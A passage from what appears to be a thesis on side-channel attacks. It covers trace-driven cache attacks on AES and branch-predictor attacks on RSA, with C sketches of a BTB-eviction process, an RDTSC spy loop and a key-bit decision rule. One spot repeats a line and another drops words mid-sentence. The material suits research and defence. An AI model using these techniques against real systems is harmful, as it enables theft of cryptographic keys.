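    /* Index of the first access to T1 in the second round, following the
     * formula in the text; d[i] stands for Delta_i = P_i ^ K_i. */
    static uint8_t t1_second_round_index(const uint8_t d[16], const uint8_t K[16])
    {
        return (uint8_t)(Sbox[d[4]] ^ mul2(Sbox[d[9]]) ^ mul3(Sbox[d[14]])
                         ^ Sbox[d[3]] ^ Sbox[K[14]] ^ K[1] ^ K[5]);
    }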
Using only the first 5 accesses to T1, i.e., up to the fourth step of the two-round
attack, and searching through K_3, K_4, K_9, and K_14, we can recover these four
bytes. This guessing problem has a key space of 2^32. Notice that we can already
recover ⟨K_1 ⊕ K_5⟩ in the first round attack.
The indices of the first accesses to each of the lookup tables in the second
round are functions of different key bytes and these functions span each of the 16
key bytes. Hence, we can recover the entire key by analyzing only the outcomes
of the first 5 accesses to each of the four tables, i.e., a total of 20 accesses.
Although knowing only the outcomes of the first 5 accesses is sufficient
to recover the key, extending the attack by taking advantage of further accesses
reduces the number of required traces. We want to mention that only the accesses
of the first two rounds can be used in such a known-plaintext attack. The reason
is the full avalanche effect. Starting from the third round, the indices become
functions of the entire key, making an exhaustive search as efficient as our attack.
6.3. Analysis of the Attacks
In this section we estimate the number of traces that need to be captured to
recover the secret key. In other words, we determine the cost of the attacks
presented above.
In the following subsections, we first present a computational model that
allows us to determine the cost of trace-driven attacks and then we use this model
to perform the cost analysis of the proposed attacks. The accuracy of our model
has been verified experimentally.
6.3.1. Our Model
Let m be 2^(8−ℓ), i.e., the number of blocks in a table, where a block of a
table is defined as a group of its elements that are stored together in a single
cache line. The cost of a trace-driven attack is a function of m. The two
most common values of m today are 16 and 32, and thus we evaluate the cost of
the attacks for these two values of m.
In order to calculate the expected number of traces, we first need an
expression for the expected number of table blocks that are loaded
into the cache after the first k accesses. We denote this expected number by #_k.
The probability that a single table block is not loaded into the cache after
k accesses to this table is ((m−1)/m)^k. The expected number of blocks that are not
loaded is therefore m ∗ ((m−1)/m)^k, and thus

#_k = m − m ∗ ((m−1)/m)^k .
Let R^k_expected be the expected fraction of the wrong key hypotheses that
obey the captured trace in the k-th step of the attack. In other words, a wrong key
hypothesis that generated the same trace as the correct key in the first k accesses
of an encryption generates the captured outcome in the next step
with probability R^k_expected. Therefore, if the adversary captures the outcomes
of the first (k + 1) accesses (1 ≤ k ≤ 15) to T4 during a single encryption, he can
eliminate a (1 − R^k_expected) fraction of the wrong key hypotheses in the k-th step of the
attack, where

R^k_expected = (#_k / m) ∗ (#_k / m) + (1 − #_k / m) ∗ (1 − #_k / m) , 1 ≤ k ≤ 15 .
Notice that R^k_expected is not the k-th power of a constant R_expected; it is
a quantity parameterized by k. The left (right) term of
the above summation is the product of the probability of a cache hit (miss, resp.)
and the expected fraction of the wrong hypotheses that remain after eliminating the
ones that do not cause a hit (miss, resp.).
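These two expressions are easy to tabulate; the short program below (a sketch) reproduces the values listed in Figure 6.1.

    #include <stdio.h>
    #include <math.h>

    int main(void)
    {
        const int ms[2] = {32, 16};
        for (int j = 0; j < 2; j++) {
            double m = ms[j];
            printf("m = %.0f\n", m);
            for (int k = 1; k <= 15; k++) {
                /* expected number of table blocks loaded after k accesses */
                double nk = m - m * pow((m - 1.0) / m, k);
                /* expected fraction of wrong hypotheses surviving step k */
                double r  = (nk / m) * (nk / m) + (1.0 - nk / m) * (1.0 - nk / m);
                printf("  k = %2d   R = %f   #k = %f\n", k, r, nk);
            }
        }
        return 0;
    }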
Figure 6.1 shows the calculated values of R^k_expected and #_k for different
values of k and m. We want to mention again that these values have been experimentally
verified; the differences between the calculated and empirical values of R^k_expected
are less than 0.2% on average. We can use these values to find the
expected number of remaining wrong key hypotheses after t measurements, the
expected number of measurements needed to reduce the key space to a specific
size, or in any similar calculation.
6.3.2. Trade-off Between Online and Offline Cost
There is an obvious trade-off between the online and offline cost of the attacks.
If an adversary can capture a higher number of traces, it becomes easier to find
the key, since eliminating more wrong hypotheses in early steps reduces the cost of
the later steps. The change in the offline cost of the attacks with the number of
captured traces can be seen in Figures 6.2 and 6.3.
As shown in Figure 6.3, the last round attack requires only 5 measurements (for
m = 16) to reduce the computational effort of breaking the entire 128-bit key below the
recommended minimum security levels (c.f. [30]). NSA and NIST recommend a
minimum key length of 80 bits for symmetric ciphers, so that the computational
effort of an exhaustive search is at least 2^80.
  k      m = 32                       m = 16
         R^k_expected   #_k           R^k_expected   #_k
  1      0.939453       1.000000      0.882813       1.000000
  2      0.884523       1.968750      0.787140       1.937500
  3      0.834806       2.907227      0.709919       2.816406
  4      0.789923       3.816376      0.648487       3.640381
  5      0.749522       4.697114      0.600528       4.412857
  6      0.713273       5.550329      0.564035       5.137053
  7      0.680868       6.376881      0.537265       5.815988
  8      0.652021       7.177604      0.518709       6.452488
  9      0.626464       7.953304      0.507063       7.049208
 10      0.603946       8.704763      0.501197       7.608632
 11      0.584236       9.432739      0.500138       8.133093
 12      0.567116      10.137966      0.503050       8.624775
 13      0.552384      10.821155      0.509209       9.085726
 14      0.539850      11.482994      0.517999       9.517868
 15      0.529340      12.124150      0.528890       9.923002

FIGURE 6.1. The calculated values of #_k and R^k_expected for different values of m.
        m = 16                            m = 32
 Number of traces   Cost ≈       Number of traces   Cost ≈
       15           2^48.43            30            2^36.83
       20           2^39.09            35            2^35.27
       25           2^34.74            40            2^34.61
       30           2^33.68            45            2^34.36
       35           2^33.53            50            2^34.28
      ≥40          < 2^33.50          ≥55           < 2^34.26

FIGURE 6.2. The cost analysis results of the two-round attack.
        m = 16                            m = 32
 Number of traces   Cost ≈       Number of traces   Cost ≈
        1           2^117.68            1            2^120.93
        5           2^74.51             5            2^90.76
       10           2^35.12            10            2^56.16
       20           2^24.22            20            2^33.97
       30           2^21.36            30            2^27.77
       40           2^20.08            40            2^24.88
       50           2^19.46            50            2^23.25
       75           2^19.13            75            2^21.22
      100           2^19.12           100            2^20.39

FIGURE 6.3. The cost analysis results of the last round attack.
6.4. Experimental Details
We performed experiments to test the validity of the values presented above. The
results show a very close agreement between our model and the empirical data,
which confirms the validity of the model and calculations.
Bertoni et al. showed that the cache traces could be captured by measuring
power consumption [15]. In our experimental setup, we did not measure the power
consumption, instead we assumed the correctness of their argument.
We simply modified the AES source code of OpenSSL [71], which is arguably
the most widely used open source cryptographic library. The purpose of
our modifications was not to alter the execution flow of the cipher, but to store
the values of the access indices. These index values were then used to generate
the cache traces. This process allowed us to capture the traces and obtain the
empirical results. The average difference between the empirical and calculated
values of R^k_expected, i.e., the error rate, is less than 0.2%. We believe this shows
enough accuracy to validate our model.
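A minimal sketch of this kind of instrumentation is shown below; the names of the logging hook and buffer are illustrative and not the actual OpenSSL identifiers. Every table lookup additionally records its block number, and the hit/miss trace is derived by checking whether that block has already been touched since the last cache cleaning.

    #include <stdint.h>

    #define MAX_ACCESSES 160

    static uint8_t block_log[MAX_ACCESSES];   /* block numbers, in access order */
    static int     n_logged;

    /* called from the modified cipher code at every lookup into one table;
     * 'index' is the table index, 'e' the number of in-line index bits */
    static void log_access(uint8_t index, unsigned e)
    {
        if (n_logged < MAX_ACCESSES)
            block_log[n_logged++] = (uint8_t)(index >> e);
    }

    /* turn the logged block numbers into a hit(1)/miss(0) trace, assuming the
     * table was evicted from the cache before the encryption started */
    static void to_trace(uint8_t *trace)
    {
        uint8_t seen[256] = {0};
        for (int i = 0; i < n_logged; i++) {
            trace[i] = seen[block_log[i]];
            seen[block_log[i]] = 1;
        }
    }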
We generated one million randomly chosen cipher keys and encrypted 100
random plaintexts under each of these keys. In other words, we performed the
last round attack steps with 100 random plaintexts per key. After each encryption, we
determined the ratio of the number of remaining wrong key hypotheses to the
number of wrong key hypotheses that were present before the encryption. We call
this ratio the reduction ratio, the expectation of which is R^k_expected. We then
averaged these measured values. Our results show a very close correlation between
the measured and calculated values. The calculated R^k_expected values are given in
Subsection 6.3.1.
6.5. Conclusion
We have presented trace-driven cache attacks on the most widely used
software implementation of the AES cryptosystem. We have also developed a mathematical
model, whose accuracy has been experimentally verified, to evaluate the cost
of the proposed attacks. We have analyzed the cost using two different metrics,
each of which represents the cost of a different phase of the attack.
Our analysis shows that such trace-driven attacks are very efficient and
require a very low number of encryptions to reveal the secret key of the cipher.
To be more specific, an adversary can reduce the strength of the 128-bit AES cipher
below the recommended minimum security level by capturing the traces of only 5
encryptions. Having more traces reduces the total cost of the attack significantly.
Our results also show this trade-off between the online and offline cost of the
attack in detail.
7. PREDICTING SECRET KEYS VIA BRANCH PREDICTION
The contradictory requirements of increased clock speed and decreased
power consumption in today's computer architectures make branch predictors
an inevitable central CPU ingredient, one that significantly determines the so-called
Performance per Watt measure of a high-end CPU, c.f. [41]. Thus, it is not surprising
that there has been vibrant and very practical research on more and
more sophisticated branch prediction mechanisms, c.f. [78, 91, 92].
Unfortunately, the present chapter identifies branch prediction, even in
the presence of recent security promises for commodity platforms from the Trusted
Computing area, as a novel and unforeseen security risk. Indeed, although even
the most recently found security risks for x86-based CPUs have been implicitly
pointed out in the old but thorough x86-architecture security analysis, c.f. [95],
we have not been able to find any hint in the literature spotting branch prediction as an obvious side-channel attack victim. Let us elaborate a little bit on
this connection between side-channel attacks and modern computer-architecture
ingredients.
So far, typical targets of side-channel attacks have been mainly Smart
Cards, c.f. [28, 59]. This is due to the ease of applying such attacks to smart
cards. The measurements of side-channel information on smart cards are almost
“noiseless”, which makes such attacks very practical. On the other side, there are
many factors that affect such measurements on real commodity computer systems
based upon the most successful one, the Intel x86-architecture, c.f. [91]. These
factors create noise, and therefore it is much more difficult to develop and perform
successful attacks on such “real” computers within our daily life. Thus, until very
recently, the vulnerability of systems even running on servers was not “really”
considered to be harmful by such side-channel attacks. This was changed with
the work of Brumley and Boneh, c.f. [21] and Chapter 3, who demonstrated a
remote timing attack over a real local network. They simply adapted the attack
principle as introduced in [85] to show that the RSA implementation of OpenSSL
[71] — the most widely used open source crypto library — was not immune to
such attacks.
Even more recently, we have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view.
Here, it has been especially shown that the cache architecture of modern CPU’s
creates a significant security risk (c.f. [5, 14, 72, 73, 80] and Chapters 4, 5, and
6), which comes in different forms. Although the cache itself has long been
known to be a crucial security risk of modern CPUs, c.f. [95, 48], the above papers were the first to prove such vulnerabilities practically, and they raised large public
interest in such vulnerabilities.
Especially in the light of ongoing Trusted Computing efforts, cf. [99], which
promise to turn the commodity PC platform into a trustworthy platform, cf. also
[25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC
platforms are of particular interest. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far.
Even more interesting is the fact that all of the above pure software side channel
attacks also allow a totally unprivileged process to attack other processes running
in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization.
This particularly means that side-channel attacks render the sophisticated
protection mechanisms described, e.g., in [42, 103] useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks
simply exploit deeper processor ingredients, i.e., components below the trust architecture
boundary, cf. [81, 42].
Having said all this, it is natural to look for other modern computer-architecture ingredients that have not yet been identified as a security risk and
that operate below the current trust architecture boundaries. That is the
focus of the present and the next chapters: a processor's Branch Prediction Unit
(BPU). More precisely, we analyze BPUs and highlight the security vulnerabilities
associated with their opaque operations deep inside a processor. In other words,
we present so-called branch prediction attacks on simple RSA implementations as
a case study to describe the basics of the novel attacks an adversary can use to
compromise the security of a platform. Our attacks can also be adapted to other
RSA implementations and/or other public-key systems like ECC. We try to refer
to specific vulnerable implementations throughout this text.
7.1. Outlines of Various Attack Principles
We gradually develop 4 different attack principles in this section. Although
we describe these attacks on a simple RSA implementation, the underlying ideas
can be used to develop similar attacks on different implementations of RSA and/or
on other ciphers based upon ECC. In order to do so, we assume that an adversary
knows every detail of the BPU architecture as well as the implementation details
of the cipher (Kerckhoffs’ Principle). This is indeed a valid assumption as the
BPU details can be extracted using some simple benchmarks like the ones given
in [65].
7.1.1. Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack)
In this attack, we rely on the fact that the prediction algorithms are deterministic, i.e., the prediction algorithms are predictable. We present a simple
attack below, which demonstrates the basic idea behind this attack. The presented
attack is a modified version of Dhem et al.’s attack [34]. Assume that the RSA
implementation employs Square-and-Multiply exponentiation and Montgomery
Multiplication. Assume also that an adversary knows the first i bits of d and is
trying to reveal d_i. For any message m, he can simulate the first i steps of the
operation and obtain the intermediate result that will be the input of the (i + 1)-th
squaring. Then, the attacker creates 4 different sets M1, M2, M3, and M4, where
M1 = {m | m causes a misprediction during MM of the (i + 1)-th squaring if d_i = 1}
M2 = {m | m does not cause a misprediction during MM of the (i + 1)-th squaring if d_i = 1}
M3 = {m | m causes a misprediction during MM of the (i + 1)-th squaring if d_i = 0}
M4 = {m | m does not cause a misprediction during MM of the (i + 1)-th squaring if d_i = 0},

and MM means Montgomery Multiplication. If the difference between the timing
characteristics, e.g., the average execution time, of M1 and M2 is more significant
than that of M3 and M4, then he guesses that d_i = 1. Otherwise d_i is guessed to
be 0. To express the above idea more mathematically, we define:

• An Assumption A_i^t : d_i = t, where t ∈ {0, 1}.

• A Predicate P : (m) → {0, 1} with P(m) = 1 if a misprediction occurs during
  the computation of m^2 (mod N), and P(m) = 0 otherwise.

• An Oracle O_t : (m, i) → {0, 1} under the assumption A_i^t, with O_t(m, i) = 1
  if P(m_temp) = 1 and O_t(m, i) = 0 if P(m_temp) = 0, where
  m_temp = m^((d_0, d_1, ..., d_{i−1}, t)_2) (mod N).

• A Separation S_i^t under the assumption A_i^t:
  (S_0, S_1) = ({m | O_t(m, i) = 0}, {m | O_t(m, i) = 1}).
For each bit of d, starting from d_1, the adversary performs two partitionings
based on the assumptions A_i^0 and A_i^1, where d_i is the next unknown bit that he
wants to predict. He partitions the entire sample into two different sets: each
assumption assigns every plaintext M to one of these sets according to the value of
O_t(M, i). We call these partitionings the separations S_i^0 and S_i^1. Depending on the
actual value of d_i, one of the assumptions A_i^0 and A_i^1 will be correct. We define the
separation under the correct assumption as the "Correct Separation" and the other
as the "Random Separation". To be more precise, we define the Correct Separation
CS^i as

CS^i = S_i^t = (CS_0^i, CS_1^i) = ({M | O_t(M, i) = 0}, {M | O_t(M, i) = 1}),

and the Random Separation RS^i as

RS^i = S_i^{1−t} = (RS_0^i, RS_1^i) = ({M | O_{1−t}(M, i) = 0}, {M | O_{1−t}(M, i) = 1}),

where d_i = t. The decryption of each plaintext in CS_1^i encounters a misprediction
delay during the i-th squaring, whereas none of the plaintexts in CS_0^i results in a
misprediction during the same computation. Therefore, the adversary will realize
a significant timing difference between these two sets and he can predict the value
of d_i. On the other hand, the occurrences of the mispredictions will be random-like
for the sets RS_0^i and RS_1^i, which is the reason why we call it a random
separation. We can define a correct decision as deciding d_i = t, where
O_t(M, i) = P(M^((d_0, d_1, ..., d_i)_2) (mod N)) for each possible M.
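A sketch of the resulting per-bit decision rule is given below. The simulation of the first i steps and the misprediction predicate are left as a hypothetical helper (would_mispredict), since they depend on the implementation and BPU details; the partitioning and the comparison of the timing gaps follow the M1..M4 construction above, and the sketch assumes that each of the four sets is non-empty (which holds for a large random sample).

    #include <stddef.h>

    /* Hypothetical helper: simulate the first i exponentiation steps for the
     * message and report whether the (i+1)-th squaring would cause a
     * misprediction under the assumption d_i = t. */
    extern int would_mispredict(const unsigned char *msg, size_t i, int t);

    /* Decide bit d_i from a sample of messages and their measured decryption
     * times, following the M1..M4 partitioning described in the text. */
    int decide_bit(const unsigned char **msg, const double *time, size_t n, size_t i)
    {
        double sum[2][2] = {{0, 0}, {0, 0}};   /* [assumed t][predicate value] */
        size_t cnt[2][2] = {{0, 0}, {0, 0}};

        for (size_t j = 0; j < n; j++)
            for (int t = 0; t <= 1; t++) {
                int p = would_mispredict(msg[j], i, t) ? 1 : 0;
                sum[t][p] += time[j];
                cnt[t][p]++;
            }

        /* average-time gap between the "misprediction" and "no misprediction"
         * sets, once under d_i = 1 (M1 vs M2) and once under d_i = 0 (M3 vs M4) */
        double gap1 = sum[1][1] / cnt[1][1] - sum[1][0] / cnt[1][0];
        double gap0 = sum[0][1] / cnt[0][1] - sum[0][0] / cnt[0][0];

        return gap1 > gap0 ? 1 : 0;   /* the correct assumption shows the larger gap */
    }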
This attack requires the knowledge of the BPU state just before the decryption, since this state, as well as the execution of the cipher, determines the
prediction of the target branch. This information is not readily available to an
adversary. However, he can perform the analysis phase assuming each possible
state one at a time. One expects that the above separations yield a significant
difference only under the assumption of the correct state. Yet, a better
approach is to set the BPU state manually. If the adversary has access to the
machine the cipher is running on, he can execute a process to reset the BPU state
or to set it to a desired state. Indeed, this is the strategy we follow in our other
attacks. This type of attack can be applied on any platform as long as a deterministic branch prediction algorithm is used. To break a cipher using this
kind of attack, we need a target branch whose outcome depends on the secret/private
key of the cipher, on a known nonconstant value like the plaintext or the ciphertext,
and (possibly) on some unknown values that can be searched exhaustively in a
reasonable amount of time.
7.1.1.1. Examples of vulnerable systems.
RSA with MM and without CRT (Chinese Remainder Theorem) is susceptible to this kind of attack. The conditional branch of the extra reduction
step can be used as the target branch. We have already shown the attack on
S&M exponentiation. It can also be adapted to b-ary and sliding window exponentiation, c.f. [64] and Section 2.1.2. In these cases, the adversary needs to
search each window value exhaustively and construct the partitions for each of
these candidate window values. He encounters the correct separation only for the
correct candidate and can therefore determine the correct value of the windows. If
CRT is employed in the RSA implementation, we cannot apply this attack. The
reason is that the outcome of the target branch will also depend on the values of
p and q, which are not feasible to search exhaustively. Similarly, if the RSA
implementation does not have a branch that is taken or not taken depending on
a known nonconstant value (e.g., the extra reduction step in Montgomery Multiplication, whose execution depends on the input), we cannot use this approach to
find the secret key. For example, choosing the if statement in S&M exponentiation (c.f.
Line 4 in Fig. 2.1) as our target branch does not lead to a successful attack. This is
due to the fact that the mispredictions will occur in exactly the same steps of
the exponentiation regardless of the input values, and one set in each of the two
separations will always be empty.
7.1.2. Attack 2 — Forcing the BPU to the Same Prediction
(Asynchronous Attack)
In this attack, we assume that the cipher runs on a simultaneous multithreading (SMT) machine, c.f. [92], and that the adversary can run a dummy process
simultaneously with the cipher process. In such a case, he can clear the BTB
via the operations of the dummy process and cause a BTB miss during the
execution of the target branch. The BPU automatically predicts the branch as
not taken if it misses the target address in the BTB. Therefore, there will be
a misprediction whenever the actual outcome of the target branch is ‘taken’. We
stress that the two parallel threads are isolated and share only the common BPU
resource, c.f. [92, 91, 73, 80]. Borrowed from [73], we name this kind of attack
an Asynchronous Attack, as the adversary-process needs no synchronization with
the simultaneous crypto process. Here, an adversary also does not need to know
any details of the prediction algorithm. He can simulate the exponentiations as
done in the previous attack and can partition the sample based on the “actual”
outcome of the branch. In other words, the following predicate in the oracle (c.f.
Section 7.1.1) can be used:

P(m) = 1 if the target branch is taken during the computation of m^2 (mod N),
and P(m) = 0 otherwise.
The adversary does not have to clear the entire BTB, but only the BTB set that
stores the target address of the branch under consideration, i.e., the target branch.
We define three different ways to achieve this:
• Total Eviction Method: the adversary clears the entire BTB continuously.
• Partial Eviction Method: the adversary clears only a part of the BTB continuously. The BTB set that stores the target address of the target branch
has to be in this part.
• Single Eviction Method: the adversary continuously clears only the single
BTB set that stores the target address of the target branch.
The easiest method to apply is clearly the first one, because the adversary
does not have to know the specific address of the target branch. Recall that
the BTB set that stores the target address of a branch is determined by the
logical address of that branch. The resolution of clearing the BTB plays a
crucial role in the performance of the attack. We have assumed so far that it is
possible to clear the entire BTB between two consecutive squaring operations of
an exponentiation. However, in practice this is not (always) the case. Clearing the
entire BTB may take more time than performing the operations between
two consecutive squarings. Although this does not nullify the attack, it will
(most likely) mandate a larger sample size. Therefore, if an adversary can apply
one of the last two eviction methods, he can improve the performance of the attack.
We want to mention that, from the cryptographic point of view, we can assume
that an adversary knows the actual address of any branch in the implementation
due to Kerckhoffs’ Principle. Under this assumption, the adversary can apply the
single eviction method and achieve a very fine resolution, which enables him to
cause a BTB miss each time the target branch is executed. Recall also that no
complicated synchronization between the crypto and adversary processes is needed.
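As a rough illustration of the total eviction method, the dummy process can be as simple as the following sketch: a long, unrolled sequence of distinct conditional branches executed in an endless loop. Each static branch occupies its own BTB entry; the required count (4096 here) and the address spacing of the branches are machine-dependent assumptions.

    /* Dummy BTB-eviction process (total eviction method) -- a sketch.
     * Every expansion of B is a distinct conditional branch instruction at its
     * own code address, so repeatedly running through all of them keeps
     * refilling the BTB with the dummy process' own branch targets.
     * Compile without optimization so each "if" stays a real branch. */
    #define B     if (x & 1) x ^= 0x5a; else x += 3;
    #define B8    B B B B B B B B
    #define B64   B8 B8 B8 B8 B8 B8 B8 B8
    #define B512  B64 B64 B64 B64 B64 B64 B64 B64
    #define B4096 B512 B512 B512 B512 B512 B512 B512 B512

    static volatile unsigned x;   /* volatile keeps the branches from being removed */

    int main(void)
    {
        for (;;) {
            B4096   /* 4096 distinct branches per pass; the count is an assumption */
        }
    }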
7.1.2.1. Examples of vulnerable systems.
The same systems that are vulnerable to the first attack (c.f. Section 7.1.1) are also
vulnerable to this kind of attack. The main difference of this attack compared
to the first one is the ease of applying it: there is no need to know or reverse-engineer
the subtle BPU details in order to derive the correct BPU states for specific points
in time.
7.1.3. Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack)
In the previous attack, we specifically excluded the synchronization
issue. However, if the adversary finds a way to establish synchronization with the
cipher process, i.e., he can determine when, e.g., the i-th step of the exponentiation
takes place and can clear the BTB just before that step, then he can introduce misprediction
delays at certain points during the computation. Borrowed again from [73], we
name this kind of attack a Synchronous Attack, as the adversary process needs
some kind of synchronization with the simultaneous crypto process. Assume that
the RSA implementation employs S&M exponentiation and the if statement in
S&M exponentiation (c.f. Line 4 in Figure 2.1) is used as the target branch. As
stated above, the previous attacks cannot break this system if only the mentioned
conditional branch is examined. However, if the adversary can clear the BTB set
of the target branch (c.f. the Single Eviction Method in Section 7.1.2) just before the
i-th step, he can directly determine the value of d_i in the following way.
The adversary runs RSA for a known plaintext and measures the execution time. Then he runs it again for the same input, but this time he clears the
single BTB set during the decryption just before the i-th execution of the conditional branch under examination, i.e., the if statement of Line 4 in Fig. 2.1. This
conditional branch is taken or not taken depending only on the value of d_i. If it
turns out to be taken, the second decryption will take longer than the first
execution because of the misprediction delay. Therefore, the adversary can easily
determine the value of this bit by successively analyzing the execution time.
7.1.3.1. Examples of vulnerable systems.
Any implementation of a cryptosystem is vulnerable to this kind of attack
if its execution flow is “key-dependent”. The exponents of RSA with S&M exponentiation can be obtained directly, even if the CRT is used. If RSA employs
sliding window exponentiation, then we can find a significant number of bits (but
not all) of the exponents. However, if the b-ary method is employed, then only
1/2^wsize of the exponent bits can be discovered, where wsize is the size of the window. This attack can even break such prominent and efficient implementations
that had been considered to be immune to certain kinds of side-channel attacks,
c.f. [52, 105].
7.1.4. Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)
In the previous three attacks, we have considered analyzing the execution
time of the cipher. In this attack, we will follow a different approach. Again,
assume that an adversary can run a spy process simultaneously with the cipher.
This spy process continuously executes branches, all of which map to
the same BTB set as the conditional branch under attack. In other words, there
is a conditional branch (under attack) in the cipher, which processes the exponent
and executes the corresponding sequence of operations. Moreover, assume also
that the branches in the spy process and the cipher process can only be stored in
the same BTB set. Recall that it is easy to understand the properties of the BTB
using simple benchmarks as explained in [65].
The adversary starts the spy process before the cipher, so when the cipher
starts decryption/signing, the CPU cannot find the target address of the target
branch in the BTB and the prediction must be not-taken, c.f. [92]. If the branch
turns out to be taken, then a misprediction will occur and the target address of the
branch needs to be stored in the BTB. Then, one of the spy branches has to be evicted
branch needs to be stored in BTB. Then, one of the spy branches has to be evicted
from the BTB so that the new target address can be stored in. When the spyprocess re-executes its branches, it will encounter a misprediction on the branch
that has just been evicted. If the spy process also measures the execution time
of its branches (altogether), then it can detect whenever the cipher modifies the
BTB, because the execution time of these spy branches then takes a little longer
than usual. Thus, the adversary can simply determine the complete execution
flow of the cipher process by continuously performing the same operations, i.e.,
just executing spy branches and measuring their execution time. He will see the
prediction/misprediction trace of the target branch, and so he can determine the
execution flow. We name this kind of attack an Asynchronous Attack, as the
adversary process needs no synchronization at all with the simultaneous crypto
process: it simply follows the paradigm of continuously executing spy branches
and measuring their execution time.
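A sketch of such a spy loop is shown below. The spy branches must be laid out so that they map into the same BTB set as the target branch of the cipher; that address layout is machine- and binary-specific and is only assumed here. The loop times a small group of branches with RDTSC and records the result, so that spikes in the recorded times mark the moments when the cipher replaced a spy entry in the BTB.

    #include <stdint.h>
    #include <stdio.h>

    static inline uint64_t rdtsc(void)
    {
        uint32_t lo, hi;
        __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
        return ((uint64_t)hi << 32) | lo;
    }

    #define SLOTS (1 << 20)
    static uint64_t trace[SLOTS];
    static volatile unsigned x;

    int main(void)
    {
        for (long n = 0; n < SLOTS; n++) {
            uint64_t t0 = rdtsc();
            /* a few spy branches, assumed to collide with the target branch's
             * BTB set; compile without optimization so they stay real branches */
            if (x & 1) x ^= 0x11; else x += 1;
            if (x & 2) x ^= 0x22; else x += 2;
            if (x & 4) x ^= 0x44; else x += 4;
            if (x & 8) x ^= 0x88; else x += 8;
            trace[n] = rdtsc() - t0;   /* spikes mark BTB evictions caused by the cipher */
        }
        for (long n = 0; n < SLOTS; n++)
            printf("%llu\n", (unsigned long long)trace[n]);
        return 0;
    }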
7.1.4.1. Examples of vulnerable systems.
Any implementation that is vulnerable to the previous attack is also vulnerable
to this one. Specifically, any implementation of a cryptosystem is vulnerable
the other hand, is very easy to apply, because the adversary does not have to solve
the synchronization problem at all. Considering all these aspects of the current
attack, we can confidently say that it is a powerful and practical attack, which
puts many of the current public-key implementations in danger.
7.2. Practical Results
We also performed practical experiments to validate the aforementioned
attacks, which exploit the branch predictor behavior of modern microprocessors.
Obviously, eviction-driven attacks using simultaneous multithreading are more
general and demand nearly no knowledge about the underlying BPU, compared
to the other types of branch prediction attacks described above. Thus, we have chosen
to carry out our experimental attacks in a popular simultaneous multithreading
environment, cf. [91]. In this setting, an adversary can apply this kind of attack
without any knowledge of the details of the used branch prediction algorithm and
BTB structure. Therefore, we decided to implement our two asynchronous attacks
and show their results as a proof of concept.
7.2.1. Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack)
In this kind of attack we have chosen, for reasons of simplicity and practical
significance, to implement the single and total eviction methods. We used a
dummy process that continuously evicts BTB entries by executing branches. This
process was simultaneously running with RSA on an SMT platform. It executed a
large number of branches and evicted each single BTB entry one at a time. This
method requires almost no information on the BTB structure. We performed
this attack on a very simple RSA implementation that employed square-and-multiply exponentiation and Montgomery multiplication with dummy reduction.
We used the RSA implementation in OpenSSL version 0.9.7e as a template and
made some modifications to convert this implementation into the simple one as
stated above. To be more precise, we changed the window size from 5 to 1,
turned blinding off, removed the CRT mode, and added the dummy reduction
step. The experiments were run under the configuration shown in Table 7.1. We
used random plaintexts generated by the rand() and srand() functions available
in the standard C library. The current time was fed into the srand() function as
the pseudorandom number generation seed. We measured the execution time in
terms of clock cycles using the cycle counter instruction RDTSC, which is available
at user level.
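For reference, the cycle-accurate measurement amounts to the following sketch; decrypt() is only an illustrative name for the RSA decryption call under attack.

    #include <stdint.h>

    static inline uint64_t rdtsc(void)
    {
        uint32_t lo, hi;
        __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
        return ((uint64_t)hi << 32) | lo;
    }

    /* illustrative name for the RSA decryption routine under attack */
    extern void decrypt(const unsigned char *in, unsigned char *out);

    static uint64_t time_decryption(const unsigned char *in, unsigned char *out)
    {
        uint64_t t0 = rdtsc();
        decrypt(in, out);
        return rdtsc() - t0;   /* execution time in clock cycles */
    }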
Operating System:        RedHat workstation 3
Compiler:                gcc version 3.2.3
Cryptographic Library:   OpenSSL 0.9.7e

TABLE 7.1. The configuration used in the experiments
We generated 10 million random single-block messages and measured their
decryption times under a fixed 512-bit randomly generated key. In our analysis
phase, we eliminated the outliers and used only 9 million of these measurements.
We then processed each of these plaintexts and divided them into the sets explained in Section 7.1.1 and Section 7.1.2, based on the assumption on the next
unknown bit and the assumed outcome of the target branch. Afterwards, we calculated the difference of the average execution times of the corresponding sets for
each bit of the key except the first two bits. The mean and the standard deviation
of these differences for the correct and random separations of the total eviction method
are given in Figure 7.1. On the right side, this figure also shows
the raw timing differences after averaging the 9 million measurements into one
single timing difference per bit, where a single dot corresponds to the timing difference
of a specific exponent bit, i.e., the x-axis corresponds to the exponent bits from 2
to 511.
Using the values in Figure 7.1, we can calculate the probability of successful
prediction of any single key bit. We interpret the measured average execution
time differences for the correct and random separations as realizations of normally
(Gaussian) distributed random variables, denoted by Y and X respectively. We
may assume Y ∼ N(µ_Y, σ_Y^2) and X ∼ N(µ_X, σ_X^2) for each bit of any possible
key, where µ_Y = 58.91, µ_X = 1.24, σ_Y = 62.58, and σ_X = 34.78, c.f. Figure 7.1.

FIGURE 7.1. Practical results when using the total eviction method in attack
principle 2.
We then introduce the normally distributed random variable Z as the difference
between realizations of X and Y, i.e., Z = Y − X and Z ∼ N(µ_Z, σ_Z^2). The mean
and deviation of Z can be calculated from those of X and Y as

µ_Z = µ_Y − µ_X = 58.91 − 1.24 = 57.67

σ_Z = sqrt(σ_Y^2 + σ_X^2) = sqrt((62.58)^2 + (34.78)^2) = 71.60
As our decision strategy is to pick that assumption of the bit value that yields
the highest execution time difference between the sets we constructed under that
assumption, our decision will be correct whenever Z > 0. The probability for this
realization, Pr[Z > 0], can be determined by using the standard normal distribution table, i.e.,

Pr[Z > 0] = 1 − Φ((0 − µ_Z)/σ_Z) = Φ(µ_Z/σ_Z) = Φ(0.805) ≈ 0.79,

which shows that our decisions will be correct with probability 0.79 if we use
N = 10 million samples. Although we could increase this accuracy by increasing
the sample size, this is not necessary. If we have a wrong decision for a bit,
both of the separations will be random-like afterwards and we will only encounter
relatively insignificant differences between the separations. Therefore, it is possible
